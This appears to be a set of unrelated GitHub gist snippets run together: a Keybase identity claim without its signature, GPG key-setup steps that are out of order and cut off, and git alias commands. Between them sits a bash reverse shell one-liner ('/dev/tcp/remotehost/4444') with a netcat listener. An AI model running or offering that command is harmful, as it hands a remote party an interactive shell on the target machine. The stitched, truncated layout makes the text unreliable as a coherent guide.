I hereby claim:
- I am pishchalnikov on github.
- I am pishchalnikov (https://keybase.io/pishchalnikov) on keybase.
- I have a public key whose fingerprint is 771F A1AE A6C4 694F 55F2 C790 1E0F 75A2 48A6 9707
To claim this, I am signing this object:
# On target host | |
$ bash -i >& /dev/tcp/remotehost/4444 0>&1 | |
# On local host | |
$ nc -lvp 4444 |
1. Use the following command to list the private GPG key you just created: | |
$ gpg --list-secret-keys --keyid-format LONG <email> | |
2. Copy the GPG key ID that starts with sec. In the following example, that's | |
32F2B65B9246B6CA: | |
sec rsa4096/32F2B65B9246B6CA 2017-04-01 [SC] | |
D5E4F29F3275DC0CDA8FFC8730F2B65B9246B6CA | |
uid [ultimate] User <email> | |
ssb rsa4096/B7ABC0813E4028C0 2019-04-01 [E] |
1. Install GPG for your operating system. | |
If your Operating System has gpg2 installed, replace gpg with gpg2 in | |
the following commands. | |
2. Generate the private/public key pair with the following command, which will | |
spawn a series of questions: | |
$ gpg --full-gen-key | |
3. The first question is which algorithm can be used. Select the kind you want | |
or press Enter to choose the default (RSA and RSA): |
I hereby claim:
To claim this, I am signing this object:
$ git config --global alias.st 'status -sb' | |
$ git st | |
$ git config --global alias.amend 'commit --amend -C HEAD' | |
$ git amend | |
$ git config --global alias.undo 'reset --soft HEAD^' | |
$ git undo | |
$ git config --global alias.change 'diff --word-diff' |